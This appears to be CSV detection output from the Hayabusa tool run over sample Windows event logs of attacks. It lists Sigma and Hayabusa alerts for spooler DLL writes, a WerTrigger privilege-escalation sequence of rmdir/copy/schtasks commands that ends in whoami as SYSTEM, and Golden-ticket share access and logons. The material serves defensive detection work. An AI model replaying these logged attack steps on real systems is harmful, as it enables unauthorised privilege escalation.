Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | 
Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused 
Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 
747F3D96-E928-5F33-0000-0010B8330D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 
747F3D96-E939-5F33-0000-0010ACAB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 
747F3D96-E93B-5F33-0000-0010C1B40E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 
+09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 
0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b890,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network 
Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden 
ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9b27,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 
+09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.690 
+09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.704 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 
747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 